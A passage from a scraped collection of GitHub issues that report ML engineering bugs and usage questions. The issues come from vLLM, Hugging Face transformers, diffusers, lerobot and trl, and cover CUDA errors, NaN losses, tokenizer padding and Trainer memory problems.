\u5c1d\u8bd5\u521b\u5efa\u4e00\u4e2a\u5c0f\u6a21\u578b\u6765\u89e6\u53d1\u540e\u7aef\u521d\u59cb\u5316\n try:\n MODEL_PATH = \"Qwen/Qwen3-VL-4B-Instruct\"\n from vllm import LLM\n from vllm import LLM, SamplingParams\n from vllm.assets.image import ImageAsset # vLLM \u5185\u7f6e\u5de5\u5177\uff0c\u5e2e\u4f60\u628a\u8def\u5f84 \u2192 PIL\n from vllm.assets.video import VideoAsset # \u5982\u679c\u4ee5\u540e\u60f3\u52a0\u89c6\u9891\u540c\u7406\n\n # \u968f\u4fbf\u7528\u4e00\u5f20\u56fe\u5c31\u884c\n image_path = \"\"\n from PIL import Image\n image = Image.open(image_path)\n # \u65b9\u5f0f B\uff1aURL\n # image = ImageAsset(\"image\", \"https://xxx.jpg\").pil_image\n\n # Qwen3-VL \u8981\u6c42\u7684\u5bf9\u8bdd\u6a21\u677f\n messages = [\n {\n \"role\": \"user\",\n \"content\": [\n {\"type\": \"image\", \"image\": image}, # \u56fe\u50cf\u5b57\u6bb5\n {\"type\": \"text\", \"text\": \"\u8bf7\u63cf\u8ff0\u8fd9\u5f20\u56fe\u7247\u3002\"}\n ]\n }\n ]\n # \u7528 transformers \u7684 apply_chat_template \u628a messages \u2192 \u6a21\u578b\u8f93\u5165\n from transformers import AutoTokenizer\n tok = AutoTokenizer.from_pretrained(MODEL_PATH)\n prompt = tok.apply_chat_template(\n messages,\n tokenize=False,\n add_generation_prompt=True\n )\n # ---------- \u2463 \u751f\u6210 ----------\n sampling_params = SamplingParams(\n temperature=0.7,\n max_tokens=512,\n stop_token_ids=[tok.eos_token_id, tok.convert_tokens_to_ids(\"<|im_end|>\")]\n )\n\n llm = LLM(model=MODEL_PATH, max_model_len=4096, \n limit_mm_per_prompt={\"image\": 1, \"video\": 0}, # \u6bcf\u5f20 prompt \u6700\u591a 1 \u5f20\u56fe\n dtype=\"bfloat16\", # A100/H100 \u53ef\u5f00\uff1b\u6d88\u8d39\u5361\u7528 \"float16\"\n gpu_memory_utilization=0.9,)\n print(\"vLLM\u521d\u59cb\u5316\u6210\u529f!\")\n \n\n outputs = llm.generate(\n {\"prompt\": prompt, \"multi_modal_data\": {\"image\": image}}, # \u5173\u952e\uff1a\u628a\u56fe\u4e5f\u4f20\u8fdb\u53bb\n sampling_params=sampling_params\n )\n\n response = outputs[0].outputs[0].text\n print(\"rollout\u6d4b\u8bd5\u6210\u529f! \u751f\u6210\u7684\u6587\u672c:\", response)\n except Exception as e:\n print(f\"vLLM\u521d\u59cb\u5316\u5931\u8d25: {e}\")\n\nif __name__ == \"__main__\":\n unittest.main()\n```\n\nerror is :vllm/vllm_flash_attn/flash_attn_interface.py\", line 233, in flash_attn_varlen_func [rank0]: out, softmax_lse = torch.ops._vllm_fa2_C.varlen_fwd( [rank0]: File \"/usr/local/lib/python3.10/dist-packages/torch/_ops.py\", line 1243, in __call__ [rank0]: return self._op(*args, **kwargs) [rank0]: torch.AcceleratorError: CUDA error: the provided PTX was compiled with an unsupported toolchain.\n\n\nThen, I review the code in https://github.com/vllm-project/vllm/blob/main/vllm/model_executor/models/qwen3_vl.py#L375\n\nit default set use_upstream_fa = False, when I change it to True, it works? the vllm version is 0.11.0\n\n### Before submitting a new issue...\n\n-", "url": "https://github.com/vllm-project/vllm/issues/28903", "state": "closed", "labels": [ "bug" ], "created_at": "2025-11-18T03:54:11Z", "updated_at": "2025-11-18T08:18:09Z", "comments": 1, "user": "hedes1992" }, { "repo": "huggingface/lerobot", "number": 2465, "title": "loss:nan grdn:nan How to solve the gradient explosion problem in PI05 training?", "body": "When training Pi05 using Lerobot, has anyone encountered a situation where gradients explode immediately after training? Errors occur when the batch_size is set to 64 or 32. How can this be resolved? \n\nBelow are my training commands and error logs.\n\npython src/lerobot/scripts/lerobot_train.py --dataset.repo_id=aa_merged280 --policy.type=pi05 \\\n--output_dir=./outputs/pi05_training2 --job_name=pi05_training2 \\\n--policy.pretrained_path=lerobot/pi05_base --policy.compile_model=true \\\n--policy.gradient_checkpointing=true --wandb.enable=true --policy.dtype=bfloat16 \\\n--steps=100000 --policy.device=cuda --batch_size=32 --policy.push_to_hub=false\n\nINFO 2025-11-17 22:07:40 ot_train.py:351 step:200 smpl:6K ep:9 epch:0.03 loss:nan grdn:nan lr:2.5e-06 updt_s:4.478 data_s:0.038\nWARNING 2025-11-17 22:07:40 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 22:22:38 ot_train.py:351 step:400 smpl:13K ep:18 epch:0.06 loss:nan grdn:nan lr:7.5e-06 updt_s:4.458 data_s:0.022\nWARNING 2025-11-17 22:22:38 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 22:37:34 ot_train.py:351 step:600 smpl:19K ep:27 epch:0.10 loss:nan grdn:nan lr:1.3e-05 updt_s:4.456 data_s:0.022\nWARNING 2025-11-17 22:37:34 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 22:52:31 ot_train.py:351 step:800 smpl:26K ep:36 epch:0.13 loss:nan grdn:nan lr:1.8e-05 updt_s:4.456 data_s:0.022\nWARNING 2025-11-17 22:52:31 db_utils.py:141 WandB logging of key \"loss_per_dim\" was ignored as its type \"\" is not handled by this wrapper.\nINFO 2025-11-17 23:07:29 ot_train.py:351 step:1K smpl:32K ep:45 epch:0.16 loss:nan grdn:nan lr:2.3e-05 updt_s:4.459 data_s:0.022\n", "url": "https://github.com/huggingface/lerobot/issues/2465", "state": "open", "labels": [ "bug", "policies", "training" ], "created_at": "2025-11-18T03:46:28Z", "updated_at": "2025-12-03T16:13:56Z", "user": "Lilgeneric" }, { "repo": "huggingface/lerobot", "number": 2464, "title": "Questions about Pi0.5 Model Training Details and High Level Planning Implementation", "body": "Hello, while studying the Pi0.5 model, I have two questions regarding the model implementation that I would like to ask you:\n1\u3001The paper mentions that the model adopts two-stage pre-training and designs a comprehensive loss function. However, when checking the compute_loss part in the open-source code, it is found that currently only the action loss is calculated, and the loss related to the VLM (Vision-Language Model) in the pre-training stage is not reflected. I would like to confirm whether this part is implemented elsewhere in the code or if there are other design considerations?\n2\u3001The ablation experiments in the paper show that the jointly trained Pi0.5 performs excellently in explicit and implicit High Level planning, even better than GPT4 and manual upper-level planning. However, from the open-source model code, the implementation part related to the High Level planning step has not been found for the time being. I would like to know how this part of the function is reflected in the code?\nLooking forward to your reply, thank you!", "url": "https://github.com/huggingface/lerobot/issues/2464", "state": "open", "labels": [ "question", "training" ], "created_at": "2025-11-18T01:27:59Z", "updated_at": "2025-11-20T10:45:34Z", "user": "Ginldaj" }, { "repo": "vllm-project/vllm", "number": 28876, "title": "[CI Failure]: should test_cumem.py use spawn or fork in cuda?", "body": "### Name of failing test\n\ntests/basic_correctness/test_cumem.py\n\n### Basic information\n\n- [ ] Flaky test\n- [x] Can reproduce locally\n- [ ] Caused by external libraries (e.g. bug in `transformers`)\n\n### \ud83e\uddea Describe the failing test\n\nThe test only fails locally for me when I use vllm main branch and on the CI of my PR, error is caused by cuda tests using `fork` instead of `spawn` I think, in the CI, there is a line that's trying for force spawn: https://github.com/vllm-project/vllm/blob/f2b8e1c5510cf3621dc4b910f0eba5289d9fee88/.buildkite/test-pipeline.yaml#L99-L100, but looks like it's not effective. I looked at the function that decides to use fork or spawn: https://github.com/vllm-project/vllm/blob/f8b19c0ffd65f7f6f01a0da4a39b6890f5db40cb/tests/utils.py#L1027 and I don't think it looks like the flag `VLLM_WORKER_MULTIPROC_METHOD`. Although the issue doesn't repro in the main vllm CI. Wondering how do we fix this?\n\n```\nFAILED basic_correctness/test_cumem.py::test_python_error - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_basic_cumem - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_cumem_with_cudagraph - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_end_to_end[hmellor/tiny-random-LlamaForCausalLM] - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_end_to_end[facebook/opt-125m] - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_deep_sleep - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\nFAILED basic_correctness/test_cumem.py::test_deep_sleep_async - RuntimeError: Cannot re-initialize CUDA in forked subprocess. To use CUDA with multiprocessing, you must use the 'spawn' start method\n\n```\n\n### \ud83d\udcdd History of failing test\n\nhttps://buildkite.com/vllm/ci/builds/39127/steps/canvas?jid=019a84f5-0fbf-46f3-859f-42c02a2d3de1\n\n### CC List.\n\n_No response_", "url": "https://github.com/vllm-project/vllm/issues/28876", "state": "open", "labels": [ "ci-failure" ], "created_at": "2025-11-17T18:58:08Z", "updated_at": "2025-11-17T20:59:14Z", "comments": 1, "user": "jerryzh168" }, { "repo": "vllm-project/vllm", "number": 28868, "title": "[Bug]: When compiling with ranges, we should pass the range information to Inductor", "body": "### Your current environment\n\nmain\n\n### \ud83d\udc1b Describe the bug\n\nMight be more of a feature request. Context is that https://github.com/vllm-project/vllm/pull/24248 adds a new compile ranges API, where a user can specify which ranges to compile on.\n\nWe should tell Inductor how to constrain the compilation on the symints of the compile ranges\n\n### Before submitting a new issue...\n\n- [x] Make sure you already searched for relevant issues, and asked the chatbot living at the bottom right corner of the [documentation page](https://docs.vllm.ai/en/latest/), which can answer lots of frequently asked questions.", "url": "https://github.com/vllm-project/vllm/issues/28868", "state": "open", "labels": [ "bug", "torch.compile" ], "created_at": "2025-11-17T15:41:50Z", "updated_at": "2026-01-05T23:37:12Z", "comments": 1, "user": "zou3519" }, { "repo": "vllm-project/vllm", "number": 28866, "title": "[Usage]: When is going to be the next release?", "body": "Hi everyone,\n\nThank you for developing such a great tool!\n\nI was wondering when the next release is scheduled. I\u2019m interested in running Gemma3-text type architecture GGUF quantized models with VLLM. Are there any alternatives to do this with the latest release (v0.11.0)?\n\nI also noticed that you merged this PR with the working solution on October 9:\n\nhttps://github.com/vllm-project/vllm/pull/26189", "url": "https://github.com/vllm-project/vllm/issues/28866", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-17T15:24:47Z", "updated_at": "2025-11-19T10:51:47Z", "comments": 1, "user": "Invalid-coder" }, { "repo": "huggingface/transformers", "number": 42241, "title": "How to use padding with Mistral?", "body": "I'm trying to understand how to use Mistral with `batch_size` > 1. One aspect of this is setting `padding=\"longest\"` in, e.g., `MistralCommonTokenizer.encode()`. But I'm getting `TypeError: 'set' object is not callable` when I try this. Example:\n```python\nimport torch\nfrom transformers import MistralForCausalLM, MistralCommonTokenizer\n\ntokenizer = MistralCommonTokenizer.from_pretrained(\"mistralai/Mistral-7B-Instruct-v0.3\")\nmodel = MistralForCausalLM.from_pretrained(\n \"mistralai/Mistral-7B-Instruct-v0.3\",\n dtype=torch.bfloat16,\n attn_implementation=\"sdpa\",\n device_map=\"auto\",\n)\n\nmessages = [\n \"You are a pirate chatbot who always responds in pirate speak!\",\n \"Who are you?\",\n]\n\nmodel_inputs = tokenizer.encode(messages, return_tensors=\"pt\", padding=\"longest\").to(\n model.device\n)\n```\n\nOutput:\n```\n---------------------------------------------------------------------------\nTypeError Traceback (most recent call last)\nCell In[1], line 17\n 5 model = MistralForCausalLM.from_pretrained(\n 6 \"mistralai/Mistral-7B-Instruct-v0.3\",\n 7 dtype=torch.bfloat16,\n 8 attn_implementation=\"sdpa\",\n 9 device_map=\"auto\",\n 10 )\n 12 messages = [\n 13 \"You are a pirate chatbot who always responds in pirate speak!\",\n 14 \"Who are you?\",\n 15 ]\n---> 17 model_inputs = tokenizer.encode(messages, return_tensors=\"pt\", padding=\"longest\").to(\n 18 model.device\n 19 )\n 21 generated_ids = model.generate(model_inputs, max_new_tokens=100, do_sample=True)\n 22 tokenizer.batch_decode(generated_ids)[0]\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:407, in MistralCommonTokenizer.encode(self, text, text_pair, add_special_tokens, padding, truncation, max_length, stride, pad_to_multiple_of, padding_side, return_tensors, verbose, **kwargs)\n 404 if text_pair:\n 405 raise ValueError(\"`MistralCommonTokenizer.encode` does not support `text_pair`.\")\n--> 407 padding_strategy, truncation_strategy, max_length, _ = self._get_padding_truncation_strategies(\n 408 padding=padding,\n 409 truncation=truncation,\n 410 max_length=max_length,\n 411 pad_to_multiple_of=pad_to_multiple_of,\n 412 verbose=verbose,\n 413 )\n 415 encoded_inputs = self._encode_plus(\n 416 text,\n 417 add_special_tokens=add_special_tokens,\n (...) 429 verbose=verbose,\n 430 )\n 432 return encoded_inputs[\"input_ids\"]\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:1034, in MistralCommonTokenizer._get_padding_truncation_strategies(self, padding, truncation, max_length, pad_to_multiple_of, verbose, **kwargs)\n 1031 max_length = self.model_max_length\n 1033 # Test if we have a padding token\n-> 1034 if padding_strategy != PaddingStrategy.DO_NOT_PAD and (self.pad_token is None or self.pad_token_id < 0):\n 1035 raise ValueError(\n 1036 \"Asking to pad but the tokenizer does not have a padding token. \"\n 1037 \"Please select a token to use as `pad_token` `(tokenizer.pad_token = tokenizer.eos_token e.g.)` \"\n 1038 \"or add a new pad token via `tokenizer.add_special_tokens({'pad_token': '[PAD]'})`.\"\n 1039 )\n 1041 # Check that we will truncate to a multiple of pad_to_multiple_of if both are provided\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:334, in MistralCommonTokenizer.pad_token(self)\n 329 @property\n 330 def pad_token(self) -> str:\n 331 \"\"\"\n 332 String associated to the padding token in the vocabulary.\n 333 \"\"\"\n--> 334 return self.convert_ids_to_tokens(self.pad_token_id)\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:548, in MistralCommonTokenizer.convert_ids_to_tokens(self, ids, skip_special_tokens)\n 546 tokens: list[str] = []\n 547 for token_id in ids:\n--> 548 if self._is_control_token(token_id) and skip_special_tokens:\n 549 continue\n 550 tokens.append(self.tokenizer.instruct_tokenizer.tokenizer.id_to_piece(token_id))\n\nFile ~/ad_hoc_analysis/src/asr_and_summarization/.venv/lib/python3.13/site-packages/transformers/tokenization_mistral_common.py:513, in MistralCommonTokenizer._is_control_token(self, token_id)\n 511 def _is_control_token(self, token_id: int) -> bool:\n 512 if self._tokenizer_type == MistralTokenizerType.spm:\n--> 513 return token_id in self.tokenizer.instruct_tokenizer.tokenizer._control_tokens()\n 514 elif self._tokenizer_type == MistralTokenizerType.tekken:\n 515 return token_id < self.tokenizer.instruct_tokenizer.tokenizer.num_special_tokens\n\nTypeError: 'set' object is not callable\n```\n\nEnv:\n```\n- `transformers` version: 4.57.1", "url": "https://github.com/huggingface/transformers/issues/42241", "state": "closed", "labels": [], "created_at": "2025-11-17T12:54:21Z", "updated_at": "2025-11-19T06:11:44Z", "user": "TopCoder2K" }, { "repo": "huggingface/chat-ui", "number": 1986, "title": "HI i would like to use default_headers={ \"X-HF-Bill-To\": \"org-name\" } in my chatui local deployment how i can??", "body": "Hi, \n\nSo i want to bill my Inference usage to my organization and like to pass default_headers={\n \"X-HF-Bill-To\": \"org-name\"\n } parameter how i can do that?? ", "url": "https://github.com/huggingface/chat-ui/issues/1986", "state": "open", "labels": [ "support" ], "created_at": "2025-11-17T08:33:41Z", "updated_at": "2025-11-17T08:33:41Z", "user": "aditya-oss-prog" }, { "repo": "huggingface/diffusers", "number": 12672, "title": "How to set pipe \"requires_grad=true\"\uff1f", "body": "I have set the variable and the model \"requires_grad=true\" with the following:\n` pipe.transformer.requires_grad = True\n pipe.vae.requires_grad = True`\n`prev_sample = prev_sample.detach().requires_grad_(True)`\nbut the \"requires_grad\" of result by the pipe is still not true:\n `image_tar = pipe.vae.decode(prev_sample, return_dict=False)[0]`\n\"image_tar\" still can not requires_grad, so how to set pipe \"requires_grad=true\"\uff1f(all the operation is during inference stage.)", "url": "https://github.com/huggingface/diffusers/issues/12672", "state": "closed", "labels": [], "created_at": "2025-11-17T03:36:43Z", "updated_at": "2025-11-20T12:19:20Z", "user": "micklexqg" }, { "repo": "huggingface/diffusers", "number": 12669, "title": "Flux1-Dev inference with single file ComfyUI/SD-Forge Safetensors", "body": "Is it possible to run inference with diffusers using a single-file safetensors created for ComfyUI/SD-Forge?\n\nIt looks like FluxPipeline.from_single_file() might be intended for this purpose, but I'm getting the following errors:\n\n```\nimport torch\nfrom diffusers import FluxPipeline\n\npipe = FluxPipeline.from_single_file(\"./flux1-dev-fp8.safetensors\", torch_dtype=torch.float8_e4m3fn, use_safetensors=True)\n```\n\n```\nTraceback (most recent call last):\n File \"/home/user/flux/imgen.py\", line 9, in \n pipe = FluxPipeline.from_single_file(\"./flux1-dev-fp8.safetensors\", torch_dtype=torch.float8_e4m3fn, use_safetensors=True)\n File \"/home/user/.local/lib/python3.13/site-packages/huggingface_hub/utils/_validators.py\", line 114, in _inner_fn\n return fn(*args, **kwargs)\n File \"/home/user/.local/lib/python3.13/site-packages/diffusers/loaders/single_file.py\", line 509, in from_single_file\n loaded_sub_model = load_single_file_sub_model(\n library_name=library_name,\n ...<11 lines>...\n **kwargs,\n )\n File \"/home/user/.local/lib/python3.13/site-packages/diffusers/loaders/single_file.py\", line 127, in load_single_file_sub_model\n loaded_sub_model = create_diffusers_t5_model_from_checkpoint(\n class_obj,\n ...<4 lines>...\n local_files_only=local_files_only,\n )\n File \"/home/user/.local/lib/python3.13/site-packages/diffusers/loaders/single_file_utils.py\", line 2156, in create_diffusers_t5_model_from_checkpoint\n model.load_state_dict(diffusers_format_checkpoint)\n ~~~~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/home/user/.local/lib/python3.13/site-packages/torch/nn/modules/module.py\", line 2641, in load_state_dict\n raise RuntimeError(\n ...<3 lines>...\n )\nRuntimeError: Error(s) in loading state_dict for T5EncoderModel:\n\tMissing key(s) in state_dict: \"encoder.embed_tokens.weight\". \n```\n\nI checked the safetensors file and the T5 encoder is present. However, it is named differently, which confuses diffusers.", "url": "https://github.com/huggingface/diffusers/issues/12669", "state": "open", "labels": [], "created_at": "2025-11-16T11:57:48Z", "updated_at": "2025-12-03T16:53:58Z", "comments": 12, "user": "ddpasa" }, { "repo": "huggingface/ai-deadlines", "number": 41, "title": "How to indicate ARR deadlines", "body": "Right now the yaml format assumes conferences with locations and dates, but ACL ARR has rolling deadlines not tied to a physical conference. We are largely operating around these deadlines. How can we incorporate these into this system?", "url": "https://github.com/huggingface/ai-deadlines/issues/41", "state": "open", "labels": [], "created_at": "2025-11-15T00:26:33Z", "updated_at": "2025-11-15T00:26:33Z", "user": "morrisalp" }, { "repo": "huggingface/diffusers", "number": 12662, "title": "question on stable_audio_transformer.py", "body": "Execuse me, I am leaning the code of `class StableAudioDiTModel` , I do not know what is the argument ` global_states_input_dim` used to? It seems that it is a must component that should be packed before the hidden_states sequence. and its default dim seems larger then the transformer inner_dim. What is that componenet means? If it is used to take in additional conditions, that seems can be done in the encoder outside. and compared with the concatenate, I think it may be better to repeat condition embedding to the sequence length and concat on hidden_dim. \n\nAnd what is the ` sample_size: int = 1024,` parameter used in the model creation? it seems not used during `forward` call \n\nThe func doc of `class StableAudioDiTModel:forward`, it said ``` encoder_attention_mask (`torch.Tensor` of shape `(batch_size, sequence_len)`, *optional*):```. why the shape of encoder_attention_mask is batch_size X sequence_len instead of batch_size X encoder_sequence_len to be identical with the shape of the input `encoder_hidden_states` \n\nand why thee return value of this `forward` is the direct `(hidden_states,)` but not `(hidden_states * attention_mask, )`? \n\nabout the `class StableAudioDiTModel forward`, what is the shape of parameters `rotary_embedding` and `timestep`? \n\nwhy the global_embedding is concated before the hidden_states? I think hidden_states is what we want to generated during DiT pipeline. while encoder_hidden_states is the condition signal, so global_embedding should be used to en-rich the encoder_hidden_states. and the action of concate the global_embedding before the input hidden_states sequence will change the input seq_length, according to[ [1]](https://github.com/Stability-AI/stable-audio-tools/blob/main/docs/conditioning.md#input-concatenation), the concatenation should be done in the feature_dim direction, is it? \nIt seems using normal LayerNorm layer instead of adaLN layer?", "url": "https://github.com/huggingface/diffusers/issues/12662", "state": "open", "labels": [], "created_at": "2025-11-14T09:26:01Z", "updated_at": "2025-11-25T08:53:39Z", "comments": 1, "user": "JohnHerry" }, { "repo": "vllm-project/vllm", "number": 28717, "title": "[Usage]: Errors running vLLM docker in a closed environment with gpt-oss-120b on RTX 6000 Pro", "body": "### Your current environment\n\nCan't get vLLM to start with the below configuration. Seems to have issues loading in the model .safetensors. Any ideas on what could be causing it?\n\nvllm version: 0.11.1\n\nCPU: Intel Xeon w7-2595X\nGPU: NVIDIA RTX PRO 6000 Blackwell Max-Q Workstation Edition\nModel: https://huggingface.co/openai/gpt-oss-120b/tree/main\n\nCommand:\ndocker run --rm --name vllm --gpus=all --runtime=nvidia -p 8000:8000 -e HF_HUB_OFFLINE=1 --ipc=host -v opt/models/cache/:/root/.cache/huggingface/hub vllm/vllm-openai:latest --model openai/gpt-oss-120b\n\nAlso tried: \ndocker run --rm --name vllm --gpus=all --runtime=nvidia -p 8000:8000 -e HF_HUB_OFFLINE=1 --ipc=host -v opt/models/cache/:/root/.cache/huggingface/hub vllm/vllm-openai:latest --model openai/gpt-oss-120b\n\nwith the same output.\n\n\nOutput:\nINFO 11-12 06:23:18 [__init__.py:216] Automatically detected platform cuda.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:21 [api_server.py:1839] vLLM API server version 0.11.0\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:21 [utils.py:233] non-default args: {'model': 'openai/gpt-oss-120b'}\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:21 [arg_utils.py:504] HF_HUB_OFFLINE is True, replace model_id [openai/gpt-oss-120b] to model_path [/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a]\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m `torch_dtype` is deprecated! Use `dtype` instead!\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:26 [model.py:547] Resolved architecture: GptOssForCausalLM\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m ERROR 11-12 06:23:26 [config.py:278] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a'. Use `repo_type` argument if needed., retrying 1 of 2\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m ERROR 11-12 06:23:28 [config.py:276] Error retrieving safetensors: Repo id must be in the form 'repo_name' or 'namespace/repo_name': '/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a'. Use `repo_type` argument if needed.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:28 [model.py:1730] Downcasting torch.float32 to torch.bfloat16.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:28 [model.py:1510] Using max model len 131072\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:29 [scheduler.py:205] Chunked prefill is enabled with max_num_batched_tokens=8192.\n\u001b[1;36m(APIServer pid=1)\u001b[0;0m INFO 11-12 06:23:29 [config.py:271] Overriding max cuda graph capture size to 992 for performance.\nINFO 11-12 06:23:31 [__init__.py:216] Automatically detected platform cuda.\n\u001b[1;36m(EngineCore_DP0 pid=308)\u001b[0;0m INFO 11-12 06:23:33 [core.py:644] Waiting for init message from front-end.\n\u001b[1;36m(EngineCore_DP0 pid=308)\u001b[0;0m INFO 11-12 06:23:33 [core.py:77] Initializing a V1 LLM engine (v0.11.0) with config: model='/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a', speculative_config=None, tokenizer='/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a', skip_tokenizer_init=False, tokenizer_mode=auto, revision=None, tokenizer_revision=None, trust_remote_code=False, dtype=torch.bfloat16, max_seq_len=131072, download_dir=None, load_format=auto, tensor_parallel_size=1, pipeline_parallel_size=1, data_parallel_size=1, disable_custom_all_reduce=False, quantization=mxfp4, enforce_eager=False, kv_cache_dtype=auto, device_config=cuda, structured_outputs_config=StructuredOutputsConfig(backend='auto', disable_fallback=False, disable_any_whitespace=False, disable_additional_properties=False, reasoning_parser='openai_gptoss'), observability_config=ObservabilityConfig(show_hidden_metrics_for_version=None, otlp_traces_endpoint=None, collect_detailed_traces=None), seed=0, served_model_name=/root/.cache/huggingface/hub/models--openai--gpt-oss-120b/snapshots/b5c939de8f754692c1647ca79fbf85e8c1e70f8a, enable_prefix_caching=True, chunked_prefill_enabled=True, pooler_config=None, compilation_config={\"level\":3,\"debug_dump_path\":\"\",\"cache_dir\":\"\",\"backend\":\"\",\"custom_ops\":[],\"splitting_ops\":[\"vllm.unified_attention\",\"vllm.unified_attention_with_output\",\"vllm.mamba_mixer2\",\"vllm.mamba_mixer\",\"vllm.short_conv\",\"vllm.linear_attention\",\"vllm.plamo2_mamba_mixer\",\"vllm.gdn_attention\",\"vllm.sparse_attn_indexer\"],\"use_inductor\":true,\"compile_sizes\":[],\"inductor_compile_config\":{\"enable_auto_functionalized_v2\":false},\"inductor_passes\":{},\"cudagraph_mode\":[2,1],\"use_cudagraph\":true,\"cudagraph_num_of_warmups\":1,\"cudagraph_capture_sizes\":[992,976,960,944,928,912,896,880,864,848,832,816,800,784,768,752,736,720,704,688,672,656,640,624,608,592,576,560,544,528,512,496,480,464,448,432,416,400,384,368,352,336,320,304,288,272,256,248,240,232,224,216,208,200,192,184,176,168,160,152,144,136,128,120,112,104,96,88,80,72,64,56,48", "url": "https://github.com/vllm-project/vllm/issues/28717", "state": "open", "labels": [ "usage" ], "created_at": "2025-11-14T08:49:48Z", "updated_at": "2025-11-20T15:45:21Z", "comments": 3, "user": "antonkarlsson1" }, { "repo": "huggingface/trl", "number": 4525, "title": "How to modify the advantage computation in GRPOTrainer", "body": "I\u2019m looking to customize the advantage computation used in the DAPO algorithm. Do I need to subclass the full GRPOTrainer to do this, or is it sufficient to overwrite the logic in _generate_and_score_completions, since that method appears to handle the advantage calculation?", "url": "https://github.com/huggingface/trl/issues/4525", "state": "open", "labels": [ "\u2753 question", "\ud83c\udfcb GRPO" ], "created_at": "2025-11-14T03:48:17Z", "updated_at": "2025-11-14T11:37:18Z", "user": "Tuziking" }, { "repo": "huggingface/transformers", "number": 42200, "title": "Request of rewriting implementation of prediction_step in trainer.py", "body": "### System Info\n\nAny system. Because it's a problem coming from source code.\n\n### Who can help?\n\n@SunMarc \n\n### Information\n\n- [ ] The official example scripts\n- [x] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [x] My own task or dataset (give details below)\n\n### Reproduction\n\nHi, i am talking about an issue that was reported 5 years ago but still exists in 2025, specifically, 13th Nov, 2025.\n\nI quote one of the issues that was discussed before, ignored by sgugger. Please find the link below\nhttps://discuss.huggingface.co/t/cuda-out-of-memory-when-using-trainer-with-compute-metrics/2941\n\nWhen i was about to fine tune a LLM today, i ran into the same issue but i got saved by one folk's solution provided in this discussion.\n\nHow to reproduce (you should have a GPU, no quantization, just full fine tuning):\n\n1. Find a random decoder-only text2text LLM, let's say Qwen3 0.6B.\n\n2. Prepare a train dataset (>0 rows) and eval dataset (>850 rows).\n\n3. Set eval_on_start = True, either TrainingArguments or SFTConfig could work.\n\n4. Implement your own compute_metrics BUT DON'T implement preprocess_logits_for_metrics.\n5. start training (don't need deepspeed or accelerate, just trainer.train())\n\nWhat would happen?\nFirst it would go through the evaluation dataset because i set eval_on_start=True, the model would go really fast originally but then it would go extremely slow. Finally, you would get an error that says numpy is trying to allocate a ridiculously big array to memory.\n\n\"Image\"\n\nOne of the folk who seems to be inspired by example code provided the implementation of preprocess_logits_for_metrics, which solved problem i encountered perfectly. The evaluation run is done within 2 mins.\n\nWhy it would happen?\n\nI briefly go over the source code of evaluation_loop and i located prediction_step.\n\nprediction_step says it would return a tuple of three optional torch.Tensor (loss, logits, label).\n\n\"Image\"\n\nBut most of the time, the returned logits is a tuple.\n\nWhy?\n\nif you look at the the function that processes logits before logits is returned:\n\n\"Image\"\n\nThis function would receive all kinds of \"tensors\". The type of \"tensors\" could be list, tuple, Mapping or torch.Tensor.\n\nDoes it change the variable, called \"tensors\", from other data types to torch.Tensor?\n\nNo.\n\ntype(tensors)(........) would preserve the original type of tensors. It means if the variable \"tensors\" (i hate this variable name because it is misleading and confusing) is a tuple, after this function, it's still a tuple!!!!!\n\nIt's a recursive function btw. I would love doing recursion in programming competition, but not in huggingface codebase!!! It also implies 